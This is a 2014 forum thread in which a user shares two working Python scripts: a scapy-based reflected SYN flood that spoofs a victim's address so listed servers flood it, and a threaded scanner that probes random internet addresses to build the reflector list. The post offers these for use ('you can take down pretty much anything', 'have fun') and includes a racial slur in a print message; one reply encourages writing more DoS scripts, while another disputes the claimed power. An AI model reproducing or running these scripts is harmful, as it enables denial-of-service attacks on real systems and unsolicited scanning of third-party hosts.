DrDoS Script + Reflection list generator

For the discussion of Perl, Python, Ruby, and PHP and other interpreted languages.

DrDoS Script + Reflection list generator

Post by Fl0urite on Wed Feb 12, 2014 5:08 am
([msg=79435]see DrDoS Script + Reflection list generator[/msg])

Just some "Harmless" fun :lol:
Coded this myself, you can take down pretty much anything.
you must have scapy.

source for drdos script:
Code: Select all
#!/usr/bin/python
#coded by fl0urite :P
from scapy.all import *
import sys
import threading

if os.getuid()!=0:
   print "Mah nigga, I gotta be ROOT!"
   exit()

try:   #try to grab args
   target = str(sys.argv[1])
   port = int(sys.argv[2])
   threads = int(sys.argv[3])
   ip_list = str(sys.argv[4])
except:   #FAIL!
   print "Usage: ./rdos.py [TARGET] [PORT] [THREADS] [IP LIST]"
   exit(1)

def rDoS(target,port,ip_list):
   f = open(ip_list)
   while 1:
         for x in f:   #Get ips from list, then send SYN packet; ip then respondz with ACK packets.
            try:
               SYN=IP(src=target,dst=x)/TCP(sport=port,dport=80,flags="S",seq=12345)
               send(SYN)   #ATTACK!
            except:
               pass


for i in xrange(0,threads):
   t = threading.Thread(target=rDoS, args = (target,port,ip_list))
   t.start()

code for IP list gen (it actaully tests the IPs don't worry lol)
Code: Select all
#!/usr/bin/python
#coded by fl0urite :P
from random import randrange
import socket
import sys
import threading

port=int(sys.argv[1])

print "Searching for live IPs with port "+str(port)+" open..."

#silly random ip generator I found.
def generateIP():
   blockOne = randrange(0, 255)
   blockTwo = randrange(0, 255)
   blockThree = randrange(0, 255)
   blockFour = randrange(0, 255)
   return str(blockOne) + '.' + str(blockTwo) + '.' + str(blockThree) + '.' + str(blockFour)

def Search():
   while 1:
      try:
         IP=str(generateIP())
         s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
         s.connect((IP,port))
         print IP
         s.close()
      except:
         s.close()
         pass

for i in xrange(0,500):
   try:
      t = threading.Thread(target=Search, args = ())
      t.start()
   except:
      pass


have fun :P
Fl0urite
New User
New User
 
Posts: 7
Joined: Wed Feb 12, 2014 5:01 am
Blog: View Blog (0)


Re: DrDoS Script + Reflection list generator

Post by 0phidian on Wed Feb 12, 2014 10:39 am
([msg=79436]see Re: DrDoS Script + Reflection list generator[/msg])

While these are pretty basic, it is nice to see someone writing their own. So kudos for that. I think this the best way to learn. I looked over them briefly and here are some things I noticed.

For your IP list gen you could consider adding functionality that would allow the user to specify a range to scan, just in case there looking for something a little more specific. Also there is nothing preventing it from scanning and listing duplicate IPs.
As for DrDos it looks pretty good, just a basic syn flood. You could also play around other DoS attacks, and writes scripts for them as well.

Oh, and welcome to the forums.
User avatar
0phidian
Poster
Poster
 
Posts: 269
Joined: Sat Jun 16, 2012 7:04 pm
Blog: View Blog (0)


Re: DrDoS Script + Reflection list generator

Post by Fl0urite on Sun Feb 16, 2014 12:07 am
([msg=79492]see Re: DrDoS Script + Reflection list generator[/msg])

thanks obsidian!
it isn't "just a basic syn flood"
what it does is sends a SYN packet to each IP on the list (packet is spoofed to seem lik it is coming from target) then the IP from the list will then respond with an ACK packet -> target.

basically you are using servers to flood your target with ACK packets :D

simple TCP exploit :P
Fl0urite
New User
New User
 
Posts: 7
Joined: Wed Feb 12, 2014 5:01 am
Blog: View Blog (0)


Re: DrDoS Script + Reflection list generator

Post by Goatboy on Sun Feb 16, 2014 2:01 pm
([msg=79516]see Re: DrDoS Script + Reflection list generator[/msg])

Fl0urite wrote:Coded this myself, you can take down pretty much anything.

I wouldn't make such claims unless you have proof. DoS is pretty damn easy to mitigate from a single source. The whole attack is limited by your own bandwidth. Even though you use other IPs you still can only spoof so many packets.

Fl0urite wrote:it isn't "just a basic syn flood"
what it does is sends a SYN packet to each IP on the list (packet is spoofed to seem lik it is coming from target) then the IP from the list will then respond with an ACK packet -> target.

basically you are using servers to flood your target with ACK packets :D

Then it's just a basic ACK flood. Hardly something that will "take down pretty much anything".

Fl0urite wrote:simple TCP exploit :P

Not really an exploit since there isn't a vulnerability, but meh.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2819
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)



Return to Interpreted Languages

Who is online

Users browsing this forum: No registered users and 0 guests